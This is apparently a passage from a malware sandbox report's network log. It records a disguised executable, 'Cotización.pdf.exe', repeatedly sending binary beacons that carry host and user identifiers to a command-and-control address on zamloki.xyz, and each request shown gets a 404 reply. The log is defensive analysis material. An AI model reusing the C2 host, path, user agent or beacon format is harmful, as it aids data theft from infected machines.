                                      Jul 15, 2021 12:45:00.330703020 CEST6002OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:45:00.602817059 CEST6002INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:45:00 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=nlaFvc%2BYXH5ebF22EfOuYW55BzRaiUlW69EkhKaZHjOYLlihOnYkR8Qhov8cwJOL8pl7XB0mB1p4IPLhcggUVJZYIlMY5LHnrVE0bDgd1DDBNXhyjmGD%2FIc%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f266150cd14d84-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      126192.168.2.349862172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:45:00.841449022 CEST6003OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:45:00.861264944 CEST6004OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:45:01.109972000 CEST6004INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:45:01 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=a4d0e4V%2FSX7GZxIx%2BC1bRORyc0goW2yOExakE%2Bq3AjPuViTXLW8nBXbpScLWqhS0XEBtQK9OiL61ftFVuQUQRCb1lFF7BiQzFULJ%2BGfrFnNTdMSFGCxqV4A%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f266185e514e49-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      127192.168.2.349863104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:45:01.372534990 CEST6005OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:45:01.392554045 CEST6005OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:45:01.740328074 CEST6006INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:45:01 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=r8MqjzE%2FmqOtohZQx7UwD0J%2FXKVR0w1N1D2ZOq2n3nT9epwYt9CLtSpEK2ID35N9bfuyrRc%2FD%2FjI%2FBDZWm7yqfRi8eCT7T6Ep0xL%2Bche4pGhNbeQQzQZrPE%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2661baaea4a97-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      128192.168.2.349864104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:45:01.980263948 CEST6007OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:45:01.999903917 CEST6007OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:45:02.515789986 CEST6008INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:45:02 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=mD72huc94c%2Fyzm60vFNYPoMnOxK37JGW5kbSRJX5%2BgyVPQ%2FZQEiHcjC%2FRmtZZtMZQc6Wj3y8lVwIMvAg8cnW7q3r4scGUgrQ3kClwB%2Blomsy3JPuYyxUgQ8%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2661f78031f4d-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      129192.168.2.349865104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:45:02.763633966 CEST6009OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:45:02.782844067 CEST6009OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:45:03.475857973 CEST6010INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:45:03 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=JY2s0zNNjAnsUfNBbQboEc9Q%2BdkhBvypLGL1vabZ6df6AXaEaD5J9fbkrfCXX8S%2FUZR65BanKPoQEfBw0ym%2BJS4w2S%2BWpD%2BOcFCkVuJqGoXCF%2BT8GMzEK9pDgcPl1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f266245eb5c277-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      13192.168.2.349739104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:57.132747889 CEST1406OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:43:57.150979996 CEST1406OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:43:57.406949043 CEST1409INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:57 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=Vw%2FVXUVjufp4WEXpzBh58xLp0Q9QbemZB0A3vo2gyVnqjyK2iuV4oWZx14Iw%2BZOFOzaMq0tDWG0cUWG%2B%2Fk%2FK62BVPIDvLfdAXx4SyJkXAavWRhQuV1d9bH4%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2648a296a4e97-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      130192.168.2.349866104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:45:03.711816072 CEST6011OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:45:03.732045889 CEST6011OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:45:04.155195951 CEST6012INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:45:04 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=pios6o43Rn2JalfQjtLJt9BvyUIoLf3%2B6y76aRyEgA9KuVJ2BS%2BgEpoqGPFPI8%2B1xy9dA4NgP2dAQPUWbjf0oZTlF5Ly2Ff2TC7f6eo6PmNsr2wWpafUUoc%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2662a492b2b29-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      131192.168.2.349867172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:45:04.399651051 CEST6013OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:45:04.417239904 CEST6013OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:45:04.688045025 CEST6014INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:45:04 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=eNVrQNe%2FtYlIo1fiGfocFmylZnk%2BBqmdp%2F9es0Oj066Z2DqjtyaW%2FKC0Tf9%2FjQxPXB90UwpVAWuSiVuhKIPzZIezGdaN%2BXo9UlCG2i%2FCTtc3%2F0rmwX1zBus%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2662e8f544edf-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      132192.168.2.349868104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:45:04.939384937 CEST6014OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:45:04.959274054 CEST6015OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:45:05.224467993 CEST6015INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:45:05 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=%2BVuXVNXN0DyJISy157fqY9cpIAZ2CisZSLcr%2BFq2LyvZlvgvuc2zxdEcXR2BTugQqv8HU77TTKASySauVkQBT%2FoDGFfU4dEeR8ISUt%2Fiop3z81zi3WWnWTk%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26631fd6cc286-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      133192.168.2.349869104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:45:05.460170984 CEST6016OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:45:05.477870941 CEST6017OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:45:05.762335062 CEST6017INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:45:05 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QC%2F68hqRs7O9AzaSiWgAKAEIWJ5RjnZekW4PmGk5D%2BkTEMFnxW8nUPvSMbSmlrVGI19TyKsn6b876nVWXjn4PUarR3om%2B5kRF7ZVGrgrmTBFBGAjhJlQQqFOI%2FkY1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2663529233233-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      134192.168.2.349870104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:45:06.039547920 CEST6018OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:45:06.061554909 CEST6018OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:45:06.328779936 CEST6019INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:45:06 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=YqVPRvuHwOXcCsnHOTjzdThaFwr5IbuPgziHRri1pQwpA8uElDGa2l0jEHm4gbM6aG1UUZIcOPMtnx5GwCKXCKlh4Ol81kEzMmBC4x2TmXFuNcL5qv%2BsULLBaYbM3Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f26638dbe41762-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      14192.168.2.349740104.21.6.22280C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:57.720314026 CEST1413OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:43:57.740231991 CEST1413OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:43:57.994368076 CEST1416INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:57 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=tlwJCyF2u5DlKHnvcX%2B1fxqPg%2BCOGYv580bKV9E1EMaM8yKOYw2uCe6iRSSheHN0GZw2QNPA4pOV2z4Q7IAuxnjM3qEPOCfclMMKavFWQvK%2Fz3FX9PqD0TA%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2648dded605ed-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      15192.168.2.349741172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:58.273469925 CEST1420OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:43:58.293314934 CEST1420OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:43:58.619349003 CEST1421INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:58 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=e%2B5IfeGKpq%2FlTC4bRbr0%2F9hlRF4c%2B1K4uztQ9NkmEm48pJpDhV%2F7o%2FG2p411LuAO8y5025dBUgIUxUCZ9G9nnKO4bZpsZJfmS0xt1ZDEo7YTQTwTB9HhL%2BQLZMlpuA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f264914a9c2c56-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                      16192.168.2.349742172.67.155.4580C:\Users\user\Desktop\Cotizaci#U00f3n.pdf.exe
                                      TimestampkBytes transferredDirectionData
                                      Jul 15, 2021 12:43:58.915357113 CEST1422OUTPOST /des/co/tox.php HTTP/1.0
                                      User-Agent: Mozilla/4.08 (Charon; Inferno)
                                      Host: zamloki.xyz
                                      Accept: */*
                                      Content-Type: application/octet-stream
                                      Content-Encoding: binary
                                      Content-Key: A3C8092
                                      Content-Length: 163
                                      Connection: close
                                      Jul 15, 2021 12:43:58.933010101 CEST1422OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 36 00 31 00 38 00 33 00 32 00 31 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                      Data Ascii: (ckav.ruhardz618321DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                      Jul 15, 2021 12:43:59.182940960 CEST1423INHTTP/1.1 404 Not Found
                                      Date: Thu, 15 Jul 2021 10:43:59 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Connection: close
                                      Status: 404 Not Found
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=KIqMam2QzU4L91QqMn%2BhJpUW2pSZ7gNnQsSyVcJO70ZSYBrrI4%2BZyJ3NaNYHzVOvnwr5ctdjVXj9geWVCWs4eiQUxLYCk%2FaOE%2BazIRKTq%2B2%2Fvh3LMaXxWkI%3D"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 66f2649548543240-FRA
                                      alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                      Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                      Data Ascii: File not found.


                                      Session IDSource IPSource PortDestination IPDestination PortProcess
